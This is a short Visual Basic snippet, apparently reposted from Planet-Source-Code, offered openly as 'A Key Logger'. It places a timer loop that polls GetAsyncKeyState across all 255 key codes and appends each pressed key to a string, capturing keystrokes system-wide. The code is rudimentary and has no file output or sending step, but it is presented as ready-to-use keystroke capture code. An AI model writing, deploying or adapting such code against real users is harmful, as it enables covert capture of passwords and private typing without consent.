'**************************************
' Name: A Key Logger
' Description:It Logs Your Key Presses
Place This Code In A Timer On Interval Less Then 20 The Faster It Is The
better But It Consumes More System Rescources
' By: Adam Jacob Muller
'
'This code is copyrighted and has
' limited warranties.Please see http://w
' ww.Planet-Source-Code.com/xq/ASP/txtCode
' Id.2653/lngWId.1/qx/vb/scripts/ShowCode.
' htm
'for details.
'**************************************
'Place This Code In A Timer On Interval
' Less Then 20 The Faster It Is The
'better But It Consumes More System Resc
' ources
Dim KeyLoop As Byte
Dim FoundKeys As String
Dim KeyResult As Long
For KeyLoop = 1 To 255
KeyResult = GetAsyncKeyState(KeyLoop)
If KeyResult = -32767 Then
FoundKeys = FoundKeys + Chr(KeyLoop)
End If
Next
|